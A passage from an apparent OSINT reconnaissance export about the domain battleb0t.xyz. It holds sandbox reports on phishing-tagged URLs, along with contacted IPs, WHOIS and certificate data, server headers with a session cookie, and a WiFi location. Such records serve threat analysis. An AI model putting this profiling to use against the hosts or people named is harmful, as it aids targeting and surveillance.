"Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f0c_ConnHashTable<3852>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ayt-wgt.hostingsiteforfree.com"\n 
"drivertheorytest.com"\n "www.gannett-cdn.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "loader-blue_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarA0C7.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA0D9.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"drivertheorytest.com"\n "ayt-wgt.hostingsiteforfree.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"198.144.188.52:80"\n "142.251.46.202:443"\n "185.199.110.153:443"\n "151.101.2.62:443"\n "142.250.188.10:443"\n "142.251.214.131:443"\n "162.159.134.233:443"\n "199.59.243.222:80"\n "104.27.195.88:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET 
/css?family=Lato:300,400,700|Raleway:300,400,500|Open+Sans:300,400,600,700,800 HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css?family=Lato:300,400,700|Raleway:300,400,500|Open+Sans:300,400,600,700,800 HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery.backstretch.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery.backstretch.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 
6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery.cycle.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery.cycle.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery.parallax.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery.parallax.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: 
http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /-nterforce/jquery-1.11.1.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /-nterforce/jquery-1.11.1.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: forcekutal.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /experiments/usatoday/2015/10/poll-tracker-2016/img/loader-blue.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.gannett-cdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /experiments/usatoday/2015/10/poll-tracker-2016/img/loader-blue.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.gannett-cdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /ajax/libs/jquery/2.2.4/jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 
Gecko\nAccept-Encoding: gzip, deflate\nHost: ajax.googleapis.com\nIf-Modified-Since: Tue, 20 Dec 2016 18:17:03 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /ajax/libs/jquery/2.2.4/jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://drivertheorytest.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: aja | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:36:94:66) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project management software | cdn-185-199-111-153.github.com |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | likeevideo (Category: social)
https://likee.video/@ayshoo | ayshoo |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:09:48 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 76.170.74.34.bc.googleusercontent.com | 34.74.170.76 |
| 2023-05-12 02:51:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://deepkha.github.io/Tailwind-signup/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d60_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d60_IESQMMUTEX_0_303"\n "IsoScope_d60_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d60_IE_EarlyTabStart_0xd30_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3424"\n "IsoScope_d60_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d60_ConnHashTable<3424>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n 
"104.26.9.91:443"\n "157.240.22.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.tailwindcss.com"\n "deepkha.github.io"\n "facebook.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "https://twitter.com/browserslist" (Indicator: "dir "; File: "3.3_1_.js")\n Found string "<link rel="icon" type="image/png" href="https://facebook.com/favicon.ico">" (Indicator: "dir "; File: "urlref_httpsdeepkha.github.ioTailwind-signup")\n Found string "facebook.com" (Indicator: "dir "; File: "PCAP")\n Found string "GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: facebook.comDNT: 1Connection: Keep-Alive" (Indicator: "dir "; File: "SSL")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarEAB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB8C.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', 
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"R_1_.png" has type "PNG image data 1722 x 362 8-bit/color RGBA non-interlaced" and extension "png"\n "favicon_4_.png" has type "MS Windows icon resource - 2 icons 16x16 32 bits/pixel 32x32 32 bits/pixel" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1560', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1560', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabEAA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabEAA.tmp]- [targetUID: 00000000-00002236]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002236]\n "CabB8B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB8B.tmp]- [targetUID: 00000000-00002236]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "3.3_1_.js" has type "ASCII text with 
very long lines"- [targetUID: N/A]\n "TarEAB.tmp" has type "data"- Location: [%TEMP%\\TarEAB.tmp]- [targetUID: 00000000-00002236]\n "R_1_.png" has type "PNG image data 1722 x 362 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "CabEAA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabEAA.tmp]- [targetUID: 00000000-00002236]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003424]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF78A8BEEAF387A003.TMP" has type "data"- Location: [%TEMP%\\~DF78A8BEEAF387A003.TMP]- [targetUID: 00000000-00003424]\n "~DFBE6148C01EF718F9.TMP" has type "data"- Location: [%TEMP%\\~DFBE6148C01EF718F9.TMP]- [targetUID: 00000000-00003424]\n "~DF6A767D77C862A498.TMP" has type "data"- Location: [%TEMP%\\~DF6A767D77C862A498.TMP]- [targetUID: 00000000-00003424]\n "~DF3A1E273B2E6AD4CC.TMP" has type "data"- Location: [%TEMP%\\~DF3A1E273B2E6AD4CC.TMP]- [targetUID: 00000000-00003424]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003424]\n "RecoveryStore._52F6E2B5-EEAF-11ED-B3EC-08002708D529_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_4_.png" has type "MS Windows icon resource - 2 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "_52F6E2B7-EEAF-11ED-B3EC-08002708D529_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_5C0E27F4-EEAF-11ED-B3EC-08002708D529_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon 
resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httpsdeepkha.github.ioTailwind-signup" has type "HTML document ASCII text"- [targetUID: N/A]\n "5G00TCG4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5G00TCG4.txt]- [targetUID: 00000000-00003424]\n "WU2AP75U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WU2AP75U.txt]- [targetUID: 00000000-00003424]\n "XHRTG3Z7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XHRTG3Z7.txt]- [targetUID: 00000000-00002236]\n "D4D4P3AW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D4D4P3AW.txt]- [targetUID: 00000000-00003424]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002236]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "THQVIILB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\THQVIILB.txt]- [targetUID: 00000000-00003424]\n "2ESYMYET.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2ESYMYET.txt]- [targetUID: 00000000-00003424]\n "GUPBTX7D.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GUPBTX7D.txt]- [targetUID: 00000000-00003424]\n "UL0I03E7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UL0I03E7.txt]- [targetUID: 00000000-00003424]\n "TarB8C.tmp" has type "data"- Location: [%TEMP%\\TarB8C.tmp]- [targetUID: 00000000-00002236]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002236]\n "CabB8B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 
63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB8B.tmp]- [targetUID: 00000000-00002236]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixe | 185.199.108.153 |
| 2023-05-12 02:44:37 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
